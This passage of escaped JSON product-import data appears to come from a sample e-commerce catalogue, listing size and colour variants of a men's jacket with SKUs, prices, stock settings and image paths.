zip,material=Spandex|Polyester,pattern=Solid,climate=Cold|Cool|Windy|Wintry,eco_collection=No,performance_fabric=No,erin_recommends=Yes,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MJ08-XS-Blue,size=XS,color=Blue|sku=MJ08-XS-Gray,size=XS,color=Gray|sku=MJ08-XS-Green,size=XS,color=Green|sku=MJ08-S-Blue,size=S,color=Blue|sku=MJ08-S-Gray,size=S,color=Gray|sku=MJ08-S-Green,size=S,color=Green|sku=MJ08-M-Blue,size=M,color=Blue|sku=MJ08-M-Gray,size=M,color=Gray|sku=MJ08-M-Green,size=M,color=Green|sku=MJ08-L-Blue,size=L,color=Blue|sku=MJ08-L-Gray,size=L,color=Gray|sku=MJ08-L-Green,size=L,color=Green|sku=MJ08-XL-Blue,size=XL,color=Blue|sku=MJ08-XL-Gray,size=XL,color=Gray|sku=MJ08-XL-Green,size=XL,color=Green\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj08-gray_alt1.jpg,\\/m\\/j\\/mj08-gray_back.jpg\",\"image\":\"\\/m\\/j\\/mj08-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj08-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj08-gray_alt1.jpg,\\/m\\/j\\/mj08-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Soft Shell|&frac14; zip|Full zip\",\"material\":\"Spandex|Polyester\",\"pattern\":\"Solid\",\"climate\":\"Cold|Cool|Windy|Wintry\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"Yes\",\"new\":\"No\",\"sale\":\"No\"},\"288\":{\"sku\":\"MJ09-XS-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Taurus Elements Shell-XS-Blue\",\"description\":\"<p>What\'s a little rain or snow when you\'re inside the Taurus Elements Shell? This specially engineered Cocona&reg; jacket lets you enjoy the great outdoors and brave the elements, thanks to the all-waterproof, breathable exterior.<\\/p>\\n<p>&bull; Yellow 1\\/4 zip pullover. <br \\/>&bull; Two chest pockets.<br \\/>&bull; Standard fit. <br \\/>&bull; Waterproof, breathable, seam sealed. <br \\/>&bull; Cocona&reg; performance fabric. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"65\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"taurus-elements-shell-xs-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj09-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj09-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj09-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj09-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj09-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Blue\"},\"289\":{\"sku\":\"MJ09-XS-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Taurus Elements Shell-XS-White\",\"description\":\"<p>What\'s a little rain or snow when you\'re inside the Taurus Elements Shell? This specially engineered Cocona&reg; jacket lets you enjoy the great outdoors and brave the elements, thanks to the all-waterproof, breathable exterior.<\\/p>\\n<p>&bull; Yellow 1\\/4 zip pullover. <br \\/>&bull; Two chest pockets.<br \\/>&bull; Standard fit. <br \\/>&bull; Waterproof, breathable, seam sealed. <br \\/>&bull; Cocona&reg; performance fabric. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"65\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"taurus-elements-shell-xs-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj09-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj09-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj09-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj09-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj09-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"White\"},\"290\":{\"sku\":\"MJ09-XS-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Taurus Elements Shell-XS-Yellow\",\"description\":\"<p>What\'s a little rain or snow when you\'re inside the Taurus Elements Shell? This specially engineered Cocona&reg; jacket lets you enjoy the great outdoors and brave the elements, thanks to the all-waterproof, breathable exterior.<\\/p>\\n<p>&bull; Yellow 1\\/4 zip pullover. <br \\/>&bull; Two chest pockets.<br \\/>&bull; Standard fit. <br \\/>&bull; Waterproof, breathable, seam sealed. <br \\/>&bull; Cocona&reg; performance fabric. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"65\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"taurus-elements-shell-xs-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj09-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj09-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj09-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj09-yellow_alt1.jpg,\\/m\\/j\\/mj09-yellow_back.jpg\",\"image\":\"\\/m\\/j\\/mj09-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj09-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj09-yellow_alt1.jpg,\\/m\\/j\\/mj09-yellow_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Yellow\"},\"291\":{\"sku\":\"MJ09-S-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Taurus Elements Shell-S-Blue\",\"description\":\"<p>What\'s a little rain or snow when you\'re inside the Taurus Elements Shell? This specially engineered Cocona&reg; jacket lets you enjoy the great outdoors and brave the elements, thanks to the all-waterproof, breathable exterior.<\\/p>\\n<p>&bull; Yellow 1\\/4 zip pullover. <br \\/>&bull; Two chest pockets.<br \\/>&bull; Standard fit. <br \\/>&bull; Waterproof, breathable, seam sealed. <br \\/>&bull; Cocona&reg; performance fabric. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"65\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"taurus-elements-shell-s-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj09-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj09-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj09-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj09-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj09-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Blue\"},\"292\":{\"sku\":\"MJ09-S-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Taurus Elements Shell-S-White\",\"description\":\"<p>What\'s a little rain or snow when you\'re inside the Taurus Elements Shell? This specially engineered Cocona&reg; jacket lets you enjoy the great outdoors and brave the elements, thanks to the all-waterproof, breathable exterior.<\\/p>\\n<p>&bull; Yellow 1\\/4 zip pullover. <br \\/>&bull; Two chest pockets.<br \\/>&bull; Standard fit. <br \\/>&bull; Waterproof, breathable, seam sealed. <br \\/>&bull; Cocona&reg; performance fabric. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"65\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"taurus-elements-shell-s-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj09-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj09-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj09-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj09-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj09-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"White\"},\"293\":{\"sku\":\"MJ09-S-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Taurus Elements Shell-S-Yellow\",\"description\":\"<p>What\'s a little rain or snow when you\'re inside the Taurus Elements Shell? This specially engineered Cocona&reg; jacket lets you enjoy the great outdoors and brave the elements, thanks to the all-waterproof, breathable exterior.<\\/p>\\n<p>&bull; Yellow 1\\/4 zip pullover. <br \\/>&bull; Two chest pockets.<br \\/>&bull; Standard fit. <br \\/>&bull; Waterproof, breathable, seam sealed. <br \\/>&bull; Cocona&reg; performance fabric. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"65\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"taurus-elements-shell-s-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj09-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj09-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj09-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj09-yellow_alt1.jpg,\\/m\\/j\\/mj09-yellow_back.jpg\",\"image\":\"\\/m\\/j\\/mj09-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj09-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj09-yellow_alt1.jpg,\\/m\\/j\\/mj09-yellow_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Yellow\"},\"294\":{\"sku\":\"MJ09-M-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Taurus Elements Shell-M-Blue\",\"description\":\"<p>What\'s a little rain or snow when you\'re inside the Taurus Elements Shell? This specially engineered Cocona&reg; jacket lets you enjoy the great outdoors and brave the elements, thanks to the all-waterproof, breathable exterior.<\\/p>\\n<p>&bull; Yellow 1\\/4 zip pullover. <br \\/>&bull; Two chest pockets.<br \\/>&bull; Standard fit. <br \\/>&bull; Waterproof, breathable, seam sealed. <br \\/>&bull; Cocona&reg; performance fabric. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"65\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"taurus-elements-shell-m-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj09-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj09-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj09-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj09-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj09-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},\"295\":{\"sku\":\"MJ09-M-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Taurus Elements Shell-M-White\",\"description\":\"<p>What\'s a little rain or snow when you\'re inside the Taurus Elements Shell? This specially engineered Cocona&reg; jacket lets you enjoy the great outdoors and brave the elements, thanks to the all-waterproof, breathable exterior.<\\/p>\\n<p>&bull; Yellow 1\\/4 zip pullover. <br \\/>&bull; Two chest pockets.<br \\/>&bull; Standard fit. <br \\/>&bull; Waterproof, breathable, seam sealed. <br \\/>&bull; Cocona&reg; performance fabric. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"65\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"taurus-elements-shell-m-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj09-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj09-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj09-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj09-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj09-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":n